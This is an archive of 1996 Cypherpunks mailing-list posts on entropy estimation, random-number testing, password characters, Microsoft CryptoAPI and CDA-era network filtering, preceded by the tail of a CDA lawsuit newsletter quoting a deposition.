censorhappy nut and so delighted with his "-L18" scheme that the court
realized it went too far -- that it was obviously unconstitutional.

In other words, he was our best witness.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
         WHO IS DONNA RICE? A DOJ ATTORNEY CAN'T STOP LAUGHING...
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

I would have loved to have been in Washington, DC when Grey Flannel
Suit -- AKA AFSADAFOSICCI* Howard Schmidt -- was deposed on April 1.

Imagine an entire business day filled with nothing but talk of
cyberporn, with everyone trying to be serious and lawyerly. Some
representative samples, from page 244 of Grey Flannel's deposition:

  A: The next one, the same [screen] with panties.jpg reflects the
     image that appears on the screen after clicking on Panties.
  A: The next one, the same [screen] with boobs.jpg reflects the image
     that appears on the screen after clicking on Boobs.
  A: And the next one is cunnilingus.jpg, which reflects the image
     that comes onto the screen by clicking on Cunnilingus.

But my fave part was when former party girl and ex-No Excuses jeans
model Donna Rice-Hughes was mentioned. In the past year, Rice-Hughes
has leveraged her fame from the Gary Hart presidential campaign into a
budding career as a morality crusader at the anti-porn group "Enough
is Enough!" Read on for an excerpt from page 282 of Grey Flannel's
deposition...

  Q: Are you acquainted with Kathleen Cleaver?
  A: No, I'm not.
  Q: Have you ever heard that name?
  A: It does not ring a bell, no.
  Q: Are you acquainted with Bruce Taylor?
  A: Not that I'm aware of, no.
  Q: Are you acquainted with Donna Rice?
  A: The name Donna Rice rings a bell it seems, but I don't know from what.

  [The ACLU attorneys and Pat Russotto from the DoJ can't stop laughing.]

  DoJ's Tony Coppolino: "I'll explain later."
  ACLU's Margorie Heins: "It's a honest answer."
  ACLU's Chris Hansen: "Even Pat couldn't remain serious through that."
  DoJ's Tony Coppolino, trying again: "I'll explain later!"

* AFSADAFOSICCI = Air Force Special Agent, Director of the Air Force
  Office of Special Investigations, Computer Crime Investigations


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                  CLOSING ARGUMENTS NOW SET FOR MAY 10
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

The closing arguments for our case now are scheduled for May 10, with
April 29 as the deadline for submitting our findings of fact and
conclusions of law -- a lengthy collection of documents that will
include everything we believe we've proved in our case. (Closing
arguments were pushed up to early May since we didn't feel a need to
call any rebuttal witnesses. After all, we had Olsen!)

Our attorneys and the DoJ each will present two hours of closing
arguments on May 10, though the timeframe is flexible. The three-judge
panel likely will issue a decision three or four weeks later, and
appeals will go directly to the Supreme Court.

What will the Philly court decide?

Bruce Taylor, the president of the National Law Center for Children
and Families, told me that he's "confident" the court will uphold the
indecency portions of the CDA. However, the former Federal prosecutor
said he's "worried that the court may accept some of the technical or
infeasibility arguments" against the law.

I'm sure we'll talk more about it on May 9, when I'll be on a panel
at the University of Pennsylvania with Taylor and Cathy Cleaver.

Fortunately, one of the strongest aspects of our case is that we're
correct.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on May 10 for closing arguments.

Quote of the Day: "We teach them proper principles and let them govern
                   themselves." -Prophet Joseph Smith

Mentioned in this CDA update:

  CDA Update #6, with details on Dan Olsen's "-L18" proposal:
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2143>
  Brock Meeks on 4/12 and 4/15 hearings:
    <http://www.hotwired.com/netizen/96/16/index1a.html>
  Mark Eckenwiler's report on the recent CDA forum at Cornell University:
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2226>
  CDA forum at the University of Pennsylvania, scheduled for May 9:
    <http://dolphin.upenn.edu/~fatf/cda-forum.html>
  IETF draft of "Internet Philosophy" article:
    <ftp://ds.internic.net/internet-drafts/draft-iab-principles-02.txt>
  Net-Guru David Reed's article: "CDA may pervert Internet architecture":
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2093>
  Censored by the CDA     <http://www.iuma.com/Cyborgasm/>
  Dan Olsen at BYU        <http://www.cs.byu.edu/info/drolsen.html>
  Fight-Censorship list   <http://fight-censorship.dementia.org/top/>
  BYU's censorship policy <http://advance.byu.edu/pc/releases/guidelines.html>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/zambia/>
  CMU net-censorship      <http://www.cs.cmu.edu/~kcf/censor/>
  University censorship   <http://joc.mit.edu/>
  Grey Flannel Suit       <howardas@aol.com>
  Carl Kadie's CAF site   <http://www.eff.org/CAF/>
  Blue Ribbon T-Shirts    <http://www.fqa.com/romana/blueribbon.html>

This report and previous CDA Updates are available at:
  <http://fight-censorship.dementia.org/top/>
  <http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>
  <http://www.epic.org/free_speech/censorship/lawsuit/>

To subscribe to the fight-censorship mailing list for future CDA
updates and related discussions, send "subscribe" in the body of a
message addressed to:
  fight-censorship-request@andrew.cmu.edu

Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.ala.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 19 Apr 1996 12:11:33 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604182255.PAA13373@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: daw@cs.berkeley.edu (David Wagner)
> My entropy cruncher takes in random noise from a number of diverse
> sources (some possibly of dubious quality).  I take *all* the noise
> and run it through a hash function to distill entropy.
> 
> Now I need to have some method to estimate when I have enough entropy
> in the random noise I'm crunching.  First rule: be conservative.
> One can never have too much entropy in the input to the hash function.
> 
> Therefore, I suggest making a *copy* of the input noise stream,
> running it through Jon Wienke's "this shouldn't happen" filter, and
> feeding the result to some entropy estimator.  When the entropy
> estimator says "I've got 1000 bits of entropy", I stop crunching.
> 
> This is conservative design, folks.  Using Wienke's filter in this manner
> can't be any weaker than not using it at all. (agreed?)

I see two problems with this.

The first is whether this mysterious black box, the entropy estimator,
is really possible.  In practice the only way to know how much entropy
you've gotten is to have a model for how the data is being generated,
and to deduce from that an estimate of the entropy rate.  So the entropy
estimator can't be a general-purpose calcluation, but it must be one
which is specifically chosen, developed and tuned for the specific source
of entropy you are dealing with.

Given this, what is the point of filtering?  You already have a model.
If you want to be conservative, why not just take 50% more bits than your
model says you needed?

The other problem is the functioning of this filter.  I haven't followed
Jon's proposals closely, but at one point he was talking about
histogramming the input and throwing out data which he had seen too
often.  Now this is an implicit model as well - it assumes that the data
is supposed to be uniformly distributed on a per-byte (or whatever the
data elements are) basis.

Suppose your random noise from dubious sources includes some timing
values which vary in the range 90-110, roughly normally distributed.  You
have good reason to believe that it actually is a normal distribution,
and that there are 2 or 3 good bits of entropy per sample.  If you didn't
use Jon's filter you could just collect data, hash it, and figure that
each datum gave you this much entropy.

But now if you throw Jon's filter in there, it may start throwing out all
the values in the range 90-110.  Where are the 0-80's?, it wonders.  Where
are the 120's and up?  There are way too many 100's here!  If the filter
isn't smart about the data like your model is, it could end up throwing
the whole data set out.  Your entropy counter would be spinning its
wheels waiting for more data, and you'd think you never got enough.

So I think the lesson is that there is only one way to estimate entropy,
and that is to study your source.  I have to agree with Perry that this
filtering concept is not the way to go.  It is a red herring that lures
you in the direction of automatic entropy estimation, and that is really
not safe.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 19 Apr 1996 11:49:54 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604181813.LAA14894@netcom9.netcom.com>
Message-ID: <Pine.SOL.3.91.960418160244.3843E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Bill Frantz wrote:

> I suspect, that all of us, Perry included, will react the same way if we
> find that our one time pads read like "Hamlet", or equally likely, "The
> Comedy of Errors".  That is, we will tear the source of the pad apart to
> find out why it isn't working.  If we find that it IS working correctly, we
> will wish we had used that one truly magic[*] moment to buy tickets in as
> many lotteries as possible.

Much the same feeling I had when I got a royal flush playing for matchsticks
:-)

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Microsoft Internet Announcements <inetannc@microsoft.com>
Date: Fri, 19 Apr 1996 11:53:46 +0800
To: "'cypherpunks@toad.com>
Subject: Announce: new Microsoft CryptoAPI mailing list
Message-ID: <c=US%a=_%p=msft%l=RED-89-MSG-960418231845Z-2436@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


CryptoAPI on listadmin@lists.msn.com

CryptoAPI is a mailing list (discussion list) for Microsoft
Cryptographic API (CryptoAPI), which provides services that enable
application developers to add cryptography to their Win32 applications.
For more information about CryptoAPI, see
<http://www.microsoft.com/intdev/>.

You can subscribe to the regular mailing list or a digest version. To
subscribe, send e-mail to listAdmin@lists.msn.com with the following
text in the message body (not subject line):

    subscribe CryptoAPI your@email.address
or
    digest CryptoAPI your@email.address

where <your@mail.address is your actual e-mail address.

To unsubscribe, send e-mail to listAdmin@lists.msn.com with the
following text in the message body (not subject line):

    unsubscribe CryptoAPI your@email.address

To send a message to the subscribers of the list, send e-mail to
CryptoAPI@lists.msn.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 19 Apr 1996 14:32:37 +0800
To: cypherpunks@toad.com
Subject: Announce: new Microsoft CryptoAPI mailing list (fwd)
Message-ID: <Pine.ULT.3.92.960418163349.12497B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You read it here first. Or is this not really new?

I'm approving three or four more MS announcements to
comp.os.ms-windows.announce now.

---------- Forwarded message ----------
Date: Thu, 18 Apr 1996 16:15:06 -0700
From: Microsoft Internet Announcements <inetannc@microsoft.com>
To: "'Comp.os.ms-windows.announce Moderator'" <win-announce@metrics.com>
Cc: Microsoft Internet Announcements <inetannc@microsoft.com>
Subject: Announce: new Microsoft CryptoAPI mailing list

CryptoAPI on listadmin@lists.msn.com

CryptoAPI is a mailing list (discussion list) for Microsoft
Cryptographic API (CryptoAPI), which provides services that enable
application developers to add cryptography to their Win32 applications.
For more information about CryptoAPI, see
<http://www.microsoft.com/intdev/>.

You can subscribe to the regular mailing list or a digest version. To
subscribe, send e-mail to listAdmin@lists.msn.com with the following
text in the message body (not subject line):

    subscribe CryptoAPI your@email.address
or
    digest CryptoAPI your@email.address

where <your@mail.address is your actual e-mail address.

To unsubscribe, send e-mail to listAdmin@lists.msn.com with the
following text in the message body (not subject line):

    unsubscribe CryptoAPI your@email.address

To send a message to the subscribers of the list, send e-mail to
CryptoAPI@lists.msn.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Fri, 19 Apr 1996 13:00:07 +0800
To: wombat@mcfeely.bsfs.org (Rabid Wombat)
Subject: Re: Spaces in passwords
In-Reply-To: <Pine.BSF.3.91.960418190151.603B-100000@mcfeely.bsfs.org>
Message-ID: <9604182350.AA16910@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Rabid Wombat wrote:

> On Thu, 18 Apr 1996, Jon Leonard wrote:
> > 
> > The exception to this is when you may be overheard typing a password.
> > The space bar sounds different, and an attacker who knows you've used
> > a space has a significantly smaller search space.
> > 
> > So I usually recommend avoiding space, @, #, and control characters
> > when generating passwords.  Have I missed any or gotten too many?  
>
> Why would you want to avoid #, @, etc. ?

Space sounds different, # is sometimes backspace, @ is sometimes kill-line,
and control characters often do strange things.  Those are the only characters
I avoid, though.

For example, if you're using a teletype to change your password on a UNIX
system (or it _thinks_ you _might_ be using one), and use a password of
"O&]z@d#4", you've just set your password to "4".  Control characters are
worse: ^S to lock your terminal, ^D to disconnect -- no fun.

> I have a hard enough time getting lusers to choose non-dictionary 
> passwords that they can *remember* - one technique is to teach sub-100 
> i.q. types to use two words, seperated by a #,@, etc., with a number 
> tossed in: kill#pig1et, which isn't a dictionary word, but has a chance of 
> being remembered without writing it on a sticky note and pasting it to 
> the @#%&ing monitor.

It's hard.  I'd really rather have longer pass{words,phrases} so that there's
the potential for lots of entropy without requiring line-noise for passwords.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 19 Apr 1996 11:13:19 +0800
To: andrew_loewenstern@il.us.swissbank.com (Andrew Loewenstern)
Subject: Re: NSA/Lotus public key (was Re: [IRS] Elvis in Escrow)
In-Reply-To: <9604181801.AA01102@ch1d157nwk>
Message-ID: <199604182150.QAA04527@homeport.org>
MIME-Version: 1.0
Content-Type: text


Andrew Loewenstern wrote:

| >  I wonder, how much is NSA's secret key worth?  You know, the
| >  one they use to grab the extra key bits that Lotus Notes sends
| >  them.
| 
| Does anyone know how many bits it is?  If it is 512 or less it may
| be a good candidate for a public key factoring.

	Legally, I don't know that they can export software that
handles keys longer than 512 bits.  Wait! I forgot! They are the brute
squad.

	More seriously, if they did export an API (even a private one)
that can handle keys longer than 512 bits, perhaps we could find that
out and publish information on using the NSA-strength crypto from
Notes applications.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Thu, 18 Apr 1996 19:05:06 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: EFF/Bernstein Press Release
Message-ID: <199604180731.RAA09977@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Well, that puts legislation making virus authoring a crime
into a new (and difficult) position.

Mark
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Internet Consultant, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 19 Apr 1996 15:26:16 +0800
To: cypherpunks@toad.com
Subject: Eudora Mac Pro 3.0
Message-ID: <v01540b01ad9c8d2cb5d3@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



>From the list of new features:

New Translation Services API: this is a programming interface that will make it
       easier for other software applications to simply plug into Eudora
Pro software,
       opening up a whole new world of uses for e-mail. For example,
natural language
       translation products that can translate a message from English to
some other
       language. Another example is a security application that could
automatically
       encrypt/decrypt your messages.

Interesting....

http://www.qualcomm.com/quest/mac30B.html


-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 19 Apr 1996 13:10:59 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: RE: math patents
Message-ID: <m0uA47y-00091hC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 4/18/96 -0700, Bill Stewart wrote:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 19 Apr 1996 13:34:28 +0800
To: "'cypherpunks@toad.com>
Subject: FW: EARN $350 PER DAY!!!
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960419011341Z-18898@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


I received the message below today, addressed to me.  Notice the info at
the bottom.  I didn't follow the instructions.  But this could be what
some people are receving which prompts them to send "unsuvscrive
messages".
   ..
Blanc 

>----------
>From: 	communicate@earthlink.net[SMTP:communicate@earthlink.net]
>Sent: 	Thursday, March 28, 1996 1:09 PM
>Subject: 	EARN $350 PER DAY!!!
>
>             If you would like to earn up to $350 per day... call
>1-800-545-0341!!
>
>	You can earn $350 per day giving away a product every business needs 
>	and are paying up to $3,000 for.
>
>	Help us expand our client base as the Corporation prepares to go
>public 
>	with the release of a State of the Art Software Program for the
>Internet!
>
>	This is a CAREER opportunity, not a get rich quick scheme or MLM  
>	offer.  If you are a career oriented bright professional, with a
>desire to
>	become financially successful in the 90's, then we will provide you 
>	with the product that No One can say no to. We Provide training; a
>	great support staff and average earnings of over $1,500 per week.
>	
>                   	      Full and Part-time opportunities available!
>
>			        CALL TODAY
>
>			        1-800-545-0341
>
>	-----------------------------------------------------------------------
>-----------------------------
>	Our records indicate that you may be qualified for this dynamic
>position.  If not,
>	just reply and type REMOVE in the SUBJECT heading and your name will
>	promptly be deleted from any future career opportunities with our
>organization.
>	-----------------------------------------------------------------------
>-----------------------------
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 19 Apr 1996 14:38:19 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: (Fwd) RE: Noise Sphere in Java
Message-ID: <199604182239.SAA27680@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Apr 96 at 11:13, Hal wrote:

[..]
> There was a post on cypherpunks a few days ago claiming that the output
> of "pgp +makerandom=2000 rand.pgp", which uses the PGP internal RNG,
> showed visible structure in the output of a noise sphere program.  I
> tried modifying Chuck's Java version and ran it with data from pgp
> +makerandom, and it looked fine to me.

Hm. I didn't see that post... (I wonder if he plotted an ASCII
file... or I suspect a troll?)

> However, that isn't very meaningful, because I find the that program
> output looks fine even with Chuck's version, which is using the Java
> internal RNG, a LCM from Knuth.  Specifically the Java code is:
[..]

A lot of bad PRNGs look good with noise spheres.... but what I found 
while experimenting with them was data based on timer drift samplings 
that passed a variety of randomness tests but showed up with very 
clear patterns on a noise sphere... so I made the original post to 
the list and sci.crypt about it.

Noise spheres will show certain correlations in the data.  It doesn't 
mean that the RNG is crypto-usable if it looks good. But if it looks 
bad then you know to be suspicious.... a visual image makes a clear 
point better than analyzing a lot of numbers on a page.

By no means should it be relied upon as a sole test.

[..]
> see it.  Oh, sometimes I can almost convince myself I'm seeing structure,
> but it is never repeatable from run to run.  And I see as much with the
> output of pgp.  Particularly when the graph is sparse you can see some
> clumping, but I think it is just random noise.

> If the noise sphere can't even reject an LCM RNG, it doesn't sound
> that useful to me for crypto purposes.

If you see definite spirals and loops then it's more than random 
noise.

It doesn't pass or reject anything. It plots data. If the data shows 
*definite* patterns, you can reject the RNG.  If not, use more 
sophisticated tests.

[..]
> at right angles to this.  Because polar coordinates are not uniform in
> space, the points are clustered along the north-south axis inside the
> globe.  You can see this in the views, where the upper right view should
[..]
That's probably what the poster to c'punks wrote about...

*sigh*



 
Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 19 Apr 1996 14:35:29 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <960418184409_378088479@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-18 15:05:51 EDT, Perry Metzger writes:

>Before making pronouncements like "You are still OK" you ought to
>learn a bit more about cryptanalysis. Its tiny little statistical
>toeholds like that which permit breaks. I don't know for sure, but my
>intuition says that there may very well be instances in which a couple
>of little nicks like that into the entropy of a key are sufficient to
>radically lower the time to crack something. Since there are far
>better techniques available (hash distillation, for instance) for
>assuring the quality of a random stream, Jon's suggested techniques
>should be regarded as unnecessary and dangerous.
[Slightly ad hominem PSA deleted]

1.  If "cooking" a byte sequence in a manner that reduces its maximum entropy
by less than 1% allows an attacker to break your cryptosystem, then it is
crap to begin with.  With only a little more effort, he could break it
anyway.

2.  All I was trying to say was that applying cooking technique X to a byte
sequence will reduce the maximum entropy of the sequence by a factor of Y;
adjust entropy expectations accordingly.  I said nothing about the origin of
the byte sequence, the techniques used to generate it, or the exact method
for "cooking" it.  I did not recommend against using hash distillation,
hardware RNG's, or any other commonly accepted method of generating
cryptographically useful random or pseudo-random numbers.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 19 Apr 1996 12:48:19 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: (Fwd) RE: Noise Sphere in Java
In-Reply-To: <199604182239.SAA27684@unix.asb.com>
Message-ID: <9604182348.AA00455@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant writes:
>  Noise spheres will show certain correlations in the data.  It
>  doesn't mean that the RNG is crypto-usable if it looks good.
>  But if it looks bad then you know to be suspicious....

"Statistical tests cannot find good (P)RNG's, only bad ones."  This has been  
said before in various ways on the list, but it is worth repeating...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 19 Apr 1996 14:38:57 +0800
To: Jon Leonard <jleonard@divcom.umop-ap.com>
Subject: Re: Spaces in passwords
In-Reply-To: <9604181538.AA16305@divcom.umop-ap.com>
Message-ID: <Pine.BSF.3.91.960418190151.603B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Jon Leonard wrote:

> > Ben Rothke writes:
> 
> The exception to this is when you may be overheard typing a password.
> The space bar sounds different, and an attacker who knows you've used
> a space has a significantly smaller search space.
> 
> So I usually recommend avoiding space, @, #, and control characters
> when generating passwords.  Have I missed any or gotten too many?  
> 
Why would you want to avoid #, @, etc. ?

I have a hard enough time getting lusers to choose non-dictionary 
passwords that they can *remember* - one technique is to teach sub-100 
i.q. types to use two words, seperated by a #,@, etc., with a number 
tossed in: kill#pig1et, which isn't a dictionary word, but has a chance of 
being remembered without writing it on a sticky note and pasting it to 
the @#%&ing monitor.

- r.w. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 15:07:33 +0800
To: daw@cs.berkeley.edu (David Wagner)
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <4l660q$167@joseph.cs.berkeley.edu>
Message-ID: <199604182325.TAA08657@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Wagner writes:
> Therefore, I suggest making a *copy* of the input noise stream,
> running it through Jon Wienke's "this shouldn't happen" filter, and
> feeding the result to some entropy estimator.  When the entropy
> estimator says "I've got 1000 bits of entropy", I stop crunching.
> 
> This is conservative design, folks.  Using Wienke's filter in this manner
> can't be any weaker than not using it at all. (agreed?)

Unfortunately, I think his filter puts too high a bound on the
entropy. Put it this way: I think he's only giving you an upper
bound. Furthermore, he's using his technique because he's using
spinners as RNGs, which I have a substantial fear of.

However, you are correct that this mechanism is no worse than not
using it at all. However, it doesn't substitute for doing a thorough
systems analysis to try to figure out how much entropy there actually
is in your source.

Thus, to summarize, yes, I agree with your strict statement that using
the filter this way is not weaker than not using it at all, but I'm
not sure it is worthwhile in this case because it isn't sufficient.

> Applying Wienke's filter to the random noise stream, to the input to
> the hash function, or to the output to the hash function, is clearly
> a bad idea.

Agreed.

> (The mathematician says "clearly", knowing full well that, unfortunately,
> some small part of the audience probably doesn't get it... <sigh>)

Sad but true.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 19 Apr 1996 12:18:37 +0800
To: Express <express@xor.com>
Subject: [NOISE]Re: Welcome to Express!
In-Reply-To: <199604180841.CAA04544@billygoat.xor.com>
Message-ID: <Pine.BSF.3.91.960418192815.603E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


Please unsuscrive toasterpunks

On Thu, 18 Apr 1996, Express wrote:

> Dear Guest: 
> 
> Merci! and thank you for registering. At Express Online, your user
> name is "cypherpu" and your password is "cypherpunks". 
> 

Merde. Vat ist dis? Mein dachshund ist kaput.


> To enter the world of Express, use this user name/password combination.
> Please save this record for future reference, so you can always
> download the latest news from Express on fashion, shopping, travel,
> music and more.
> 
Please to send 5000 bass-o-matics to Adam's house. See archive for address.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 19 Apr 1996 12:18:20 +0800
To: John Robert LoVerso <john@loverso.southborough.ma.us>
Subject: Re: Unsubsrive
In-Reply-To: <9876543210.ABCDEF@loverso.southborough.ma.us>
Message-ID: <Pine.SUN.3.91.960418194153.14355D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, John Robert LoVerso wrote:

> Unsubsrive me!
> 
> 

Per request by unicorn@schloss.li
        "add john@loverso.southborough.ma.us clueless"
'john@loverso.southborough.ma.us' was ADDED to the 'clueless' mailing list.



---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 19 Apr 1996 14:34:40 +0800
To: steven farr <sfarr.SAF@worldnet.att.net>
Subject: Re: your mail
In-Reply-To: <199604182010.UAA03402@mailhost.worldnet.att.net>
Message-ID: <Pine.SUN.3.91.960418194241.14355E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, steven farr wrote:

> unscribe sfarr.SAF@worldnet.com
> Steven A Farr

Per request by unicorn@schloss.li
        "add sfarr.saf@worldnet.att.net clueless"
'sfarr.saf@worldnet.att.net' was ADDED to the 'clueless' mailing list.


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Robert LoVerso <john@loverso.southborough.ma.us>
Date: Fri, 19 Apr 1996 14:56:59 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Unsubsrive
In-Reply-To: <Pine.SUN.3.91.960418194153.14355D-100000@polaris.mindport.net>
Message-ID: <199604190010.UAA03256@loverso.southborough.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


> On Thu, 18 Apr 1996, John Robert LoVerso wrote:
> Unsubsrive me!

Ha ha.  Very funny forgery.  The fool who forged the "unsubsrive" in my
name wasn't even clever.  He left his calling card all over the message:

    Received: by sturgeon.coelacanth.com (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0)
	for cypherpunks@toad.com; id AA0833; Thu, 18 Apr 96 14:23:07 -0400

Please undo your [collective] dirty work.

John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven farr <sfarr.SAF@worldnet.att.net>
Date: Fri, 19 Apr 1996 09:21:43 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604182010.UAA03402@mailhost.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


unscribe sfarr.SAF@worldnet.com
Steven A Farr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven farr <sfarr.SAF@worldnet.att.net>
Date: Fri, 19 Apr 1996 09:22:00 +0800
To: cypherpunks@toad.com
Subject: unscribe
Message-ID: <199604182010.UAA03407@mailhost.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


unscribe sfarr.SAF@worldnet.att.net
 please take me off your mailing list
Steven A Farr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 20 Apr 1996 04:36:02 +0800
To: sjb@universe.digex.net
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604172021.QAA01638@universe.digex.net>
Message-ID: <OTwdx8m9LYbG085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199604172021.QAA01638@universe.digex.net>,
Scott Brickner <sjb@universe.digex.net> wrote:

> I'm beginning to agree with the CDA supporter who claimed that "you're
> just trying to protect your pornography by saying it's impossible when
> we all know otherwise."  Of course, that person really didn't know
> otherwise, but I do.  The abstract model of the Internet network layer
> thinks of all transport entities as equivalent, as are all link
> entities.  In the real world, such mixed user bases are unusual.  If my
> scheme were implemented, service providers would probably have to
> segregate shell account access onto "childproof" and "adult" machines,
> or acquire a TCSEC B level system.  Either approach works, and most
> would likely choose the former, since its cheaper.  It's still not
> really that many machines.

Don't forget: There are lots of colleges and universities on the net,
and most of these universities have undergraduates, and a significant
fraction of these undergraduates are minors.  The potential user base is
going to be mixed and must be presumed to be so.  (That, I'm told, is
the chief justification of the Carnegie-Mellon ban on the alt.sex.*
